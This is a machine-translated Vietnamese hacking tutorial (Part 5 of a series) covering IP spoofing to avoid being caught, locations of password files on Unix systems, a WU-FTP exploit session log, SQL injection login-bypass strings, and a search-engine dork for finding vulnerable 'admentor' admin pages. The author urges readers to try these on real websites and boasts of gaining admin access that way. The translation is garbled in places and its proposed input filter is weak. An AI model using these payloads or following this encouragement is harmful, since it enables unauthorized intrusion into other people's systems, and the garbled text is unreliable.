TCP / IP stands for Transmission Control Protocol and Internet Protocol, a TCP / IP packet is a block of compressed data, then attaches a header and sends it to another computer. This is how the internet transmits, by sending packets. The header in a packet contains the IP address of the sender. You can rewrite a packet and make it in like coming from someone else !! You can use this way to find ways to access many systems without being caught. You will have to run on Linux or have a program that allows you to do this.
32. What is Linux:
In the original sense, Linux is the kernel of the OS. Multiplication is a software responsible for communication between computer application programs and hardware. Provide features such as file management, virtual memory management, devices that import but hard drive, monitor, keyboard, . But Linux kernel is not an OS yet, so the Linux kernel needs must link to the applications written by the GNU organization to create a complete operating system: the Linux operating system. This is also why we see GNU / Linux when referring to Linux.
Next, a company or an organization encapsulates these products (Multiply and Application Program) and then fixes some configurations to bring the identity of the company / organization and make additional installments. Set up (Installation Process) for that Linux set, we have: Distribution. Distribution is different in number and type of Software is packaged as well as installation process, and versions of Nhan. Some of today's major distributions of Linux are: Debian, Redhat, Mandrake, SlackWare, Suse.
33. Basic commands to know when using or entering Linux systems:
34. Basic insights around Linux:
a. Some important directories on the server:
b. The file location contains passwd of several different versions:
CODE
AIX 3 / etc / security / passwd! / Tcb / auth / files //
A / UX 3.0s / tcb / files / auth /? / *
BSD4.3-Ren /etc/master.passwd *
ConvexOS 10 / etc / shadpw *
ConvexOS 11 / etc / shadow *
DG / UX / etc / tcb / aa / user / *
EP / IX / etc / shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 / etc / shadow x
Linux 1.1 / etc / shadow *
OSF / 1 /etc/passwd[.dir|.pag] *
SCO Unix # .2.x / tcb / auth / files //
SunOS4.1 + c2 /etc/security/passwd.adjunct ## username
SunOS 5.0 / etc / shadow
System V Release 4.0 / etc / shadow x
System V Release 4.2 / etc / security / * database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS / etc / udb *
35. Exploiting Linux bugs through security holes of WU-FTP server:
WU-FTP Server (developed by Washington University) is an FTP server software used quite commonly on Unix & Linux systems (all distributors: Redhat, Caldera, Slackware, Suse, Mandrake). .) and Windows ., hackers can execute their commands remotely via the globbing file by overwriting the file on the system.
However, exploiting this error is not easy because it must meet the following conditions:
+ Must have an account on the server.
+ Must put Shellcode into the memory of Process Server.
+ Must send a special FTP command containing a globbing special template without the server detecting an error.
+ Hacker will override a Function, Code to a Shellcode, it will probably be executed by the FTP Server itself.
Let's analyze the following example of overwriting files of FTP servers:
CODE
ftp> open localhost <== the command to open the page failed.
Connected to localhost (127.0.0.1).
220 sasha FTP server (Version wu-2.6.1-18) ready <== successful penetration of FTP server.
Name (localhost: root): anonymous <== Enter the name of this place
331 Guest login ok, send your complete e-mail address as password.
Password: ……… . <== enter the password here
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Sử dụng binary mode để chuyển đổi tập tin. <== use binary variables to convert files.
ftp> ls ~ {<== current directory listing command.
227 Entering Passive Mode (127,0,0,1,241,205)
421 Service is not available, remote server có kết nối
1405? S 0:00 ftpd: accepting connections on port 21 ç accept connection at port 21.
7611 tty3 S 1:29 gdb /usr/sbin/wu.ftpd
26256? S 0:00 ftpd:
sasha: anonymous / aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
26265 tty3 R 0:00 bash -c ps ax | grep ftpd
(gdb) at 26256
Attaching to program: /usr/sbin/wu.ftpd, process 26256 <== exploiting Wu.ftpd error.
Symbols already loaded for /lib/libcrypt.so.1
Symbols already loaded for /lib/libnsl.so.1
Symbols already loaded for /lib/libresolv.so.2
Symbols already loaded for /lib/libpam.so.0
Symbols already loaded for /lib/libdl.so.2
Symbols already loaded for /lib/i686/libc.so.6
Symbols already loaded for /lib/ld-linux.so.2
Symbols already loaded for /lib/libnss_files.so.2
Symbols already loaded for /lib/libnss_nisplus.so.2
Symbols already loaded for /lib/libnss_nis.so.2
0x40165544 in __libc_read () from /lib/i686/libc.so.6
(gdb) c
Continuing.
Chương trình nhận tín hiệu SIGSEGV, Segmentation fault.
__libc_free (mem = 0x61616161) at malloc.c: 3136
3136 in malloc.c
The exploitation through this error so far I have not tested successfully (do not know where to go wrong). So what can you do, post it for me to know.
The current Linux error is very small (especially for Redhat), please wait for any new error, then the 'Security hole' will update immediately. How to exploit them, ask the manager of that side, especially Leonhart, he diligently answers you.
(Based on the brother's article Binhnx2000)
36. Learn about SQL Injection:
SQL Injection is one of the most popular types of web hacking. By injecting SQL query / command code into input before passing it to a processing web application, you can login without a username and password, execute remote commands, retrieve data and retrieve the root of SQL server. The attack tool is any web browser, such as Internet Explorer, Netscape, Lynx, .
You can get a broken Web site by using search engines to find pages that allow data submission. Some Web pages pass parameters through hidden areas, so you must see the new viewsource. For example, we can identify this page using Submit data by looking at the code that we have viewedource:
CODE
Check to see if the Web page has this error by entering login and pass times as follows:
- Login: hi` or 1 = 1--
- Pass: hi` or 1 = 1--
If not, you can try the following login and pass:
CODE
`or 1 = 1--
`` or 1 = 1--
or 1 = 1--
`or` a` = `a
`` or `` a`` = `` a
`) or (` a` = `a
If successful, you can login without knowing the username and password.
This error is related to Query, so if you have ever learned through a database, it can be exploited easily only by typing Query commands on your browser. If you want to learn more about this error, you can find the vicky group articles to find out more.
37. For example, about Web hacking through an admentor error (A type of SQL Injection error):
First go to google.com to find the admentor Web site with the keyword 'allinurl: admentor'.
Usually you will have the following results:
http://www.someserver.com/admentor /admin/admin.asp
You try to enter "` or `` = `" into login and password:
CODE
Login: `or` `=`
Password: `or` `=`
If successful, you will be infiltrated into the Web as an admin.
Let's learn about how to fix this error:
+ Filter special characters like '`` `~' by inserting the javascripts in the following code:
CODE
function RemoveBad (strTemp)
{
strTemp = strTemp.replace (/ <|> | `` | `|% |; | (|) | & | + |
- / g, `` ``);
return strTemp;
}
And call it from within the asp script:
CODE
var login = var TempStr = RemoveBad
(Request.QueryString (`` login``));
var password = var TempStr = RemoveBad
(Request.QueryString (`` password``));
So we fixed the error.
You can apply this hack to other Web sites that have submitted data, please try it and see, the Vietnamese websites are very much, I have earned quite a bit of admin by trying this. already (but also told them to fix it).
There are many pages when login not by '`or` `=' 'but by real nick names registered on that Web site, go to the' member 'link to get an admin's password to test it.
Hack happy.
In Part 6 I will mention the type of denial-of-service attack (DoS attack), a powerful attack that has caused our powerful HVA Web site to be blocked in a short time when the admin is busy. Drink all coffee without anyone watching. Accompanying are the DoS attack methods that have been used.
GOOKLUCK !!!!!!!!!!!!!!!!!!!!
(Part 5) - TG: Anhdenday
The most basic insights to becoming a Hacker - Part 4
The most basic insights to becoming a Hacker - Part 3
The most basic insights to becoming a Hacker - Part 2
The most basic insights to becoming a Hacker - Part 1